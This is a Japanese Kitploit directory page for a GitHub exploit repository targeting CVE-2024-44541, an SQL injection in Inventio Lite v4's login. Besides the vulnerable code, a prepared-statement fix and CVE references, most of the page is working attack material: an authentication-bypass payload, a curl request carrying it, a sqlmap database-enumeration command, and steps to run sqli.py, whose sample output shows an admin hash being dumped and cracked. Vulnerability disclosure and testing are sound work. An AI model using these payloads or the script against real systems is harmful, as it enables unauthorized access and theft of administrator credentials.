Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-44541 — このリポジトリでは、Inventio Lite v4のSQLインジェクションの脆弱性について詳しく説明しており、悪用手順と攻撃を自動化するPythonスクリプトを含んでいます。脆弱なコード、推奨される修正方法、管理者認証情報の抽出方法と復号化方法に関する情報も提供します。 | Kitploit
ツール/GitHubGitHub/pointedsec/cve-2024-44541
パスワードクラッキング脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubpointedsec/cve-2024-44541

CVE-2024-44541

このリポジトリでは、Inventio Lite v4のSQLインジェクションの脆弱性について詳しく説明しており、悪用手順と攻撃を自動化するPythonスクリプトを含んでいます。脆弱なコード、推奨される修正方法、管理者認証情報の抽出方法と復号化方法に関する情報も提供します。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-44541: Inventio Lite v4 における SQL インジェクションの脆弱性

説明

Inventio Lite v4 の /action=processlogin エンドポイントには、SQL インジェクション (SQLi) の脆弱性が存在します。この脆弱性により、攻撃者は POST リクエスト内の username パラメータを介して任意の SQL クエリを注入でき、不正アクセスやデータの抽出につながる可能性があります。

脆弱なコード

脆弱なコードは以下の通りです:

root@kitploit:~
if(!isset($_SESSION["user_id"])) {
    $user = $_POST['username'];
    $pass = sha1(md5($_POST['password']));

    $base = new Database();
    $con = $base->connect();
    $sql = "select * from user where (email= \"".$user."\" or username= \"".$user."\") and password= \"".$pass."\" and is_active=1";
    $query = $con->query($sql);
    $found = false;
    $userid = null;
    while($r = $query->fetch_array()){
        $found = true;
        $userid = $r['id'];
    }
}

脆弱なコードのスクリーンショット: Vulnerable Code

修正されたコード

この問題は、プリペアドステートメントを使用することで修正されています:

root@kitploit:~
if(!isset($_SESSION["user_id"])) {
    $user = $_POST['username'];
    $pass = sha1(md5($_POST['password']));

    $base = new Database();
    $con = $base->connect();

    // Prepare the query
    $stmt = $con->prepare("
        SELECT * FROM user 
        WHERE (email = ? OR username = ?) 
        AND password = ? 
        AND is_active = 1
    ");

    // Bind parameters
    $stmt->bind_param("sss", $user, $user, $pass);

    // Execute query
    $stmt->execute();

    // Get result
    $result = $stmt->get_result();
    $found = false;
    $userid = null;

    while($r = $result->fetch_assoc()){
        $found = true;
        $userid = $r['id'];
    }

    // Close statement
    $stmt->close();
}

悪用方法

認証バイパスペイロード

この脆弱性を悪用するには、以下のペイロードを使用します:

root@kitploit:~
user -> ") or 1=1-- - 
pass -> blablalba

curl を使用した攻撃の例:

root@kitploit:~
$ curl -X POST http://192.168.1.51/inventio-lite/?action=processlogin -d 'username=%22%29%20or%201%3D1--%20-&password=blablabla' -v && echo ""

SQLMap の例

root@kitploit:~
$ sqlmap -u http://192.168.1.51/inventio-lite/?action=processlogin --data="username=*&password=*" --level 5 --risk 3 --dbms=mysql --dbs --prefix='")' --batch --dbs

エクスプロイトスクリプト

脆弱性の悪用と、管理者のユーザー名およびパスワードハッシュの抽出を自動化するには、提供されている Python スクリプト sqli.py を使用できます。

このリポジトリをクローンできます:

root@kitploit:~
git clone https://github.com/pointedsec/CVE-2024-44541

次に、pip を使用して依存関係をインストールします:

root@kitploit:~
pip install -r requirements.txt

必要に応じて、スクリプト内の以下の変数を変更してください:

  • BASE_URL = "http://192.168.1.51/inventio-lite/"
  • PWD_DIC_PATH = "/usr/share/wordlists/rockyou.txt"

そしてスクリプトを実行すると、管理者のユーザー名とハッシュがダンプされ、その後 SHA1(MD5(password)) 形式でのハッシュのクラッキングが試行されます。

出力例:

root@kitploit:~
$ python3 sqli.py 
[*] Checking if target is vulnerable
[+] Target Vulnerable!
[*] Dumping Administrator username...
[◤] Extracting Username: -> [email protected]
[/] Extracting Admin Password Hash: Final Admin Hash: 90b9aa7e25f80cf4f64e990b78a9fc5ebd6cecad
[+] Password Decrypted! -> [email protected]:admin
[*] Try to Log In with that username, if that doesn't work, try with some uppercase/lowercase combinations

影響

機密性: 攻撃者はデータベース全体をダンプし、ユーザーの認証情報や個人情報などの機密データを暴露する可能性があります。

完全性: 攻撃者は認証をバイパスして管理者アクセスを取得し、データを変更または削除できる可能性があります。

参考情報

  • Inventio Lite GitHub リポジトリ
  • https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-44541
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44541
  • https://nvd.nist.gov/vuln/detail/CVE-2024-44541

クレジット

この脆弱性レポートは Andrés Del Cerro によって発見されました。詳細については、[email protected] までお問い合わせください。


ツールをダウンロード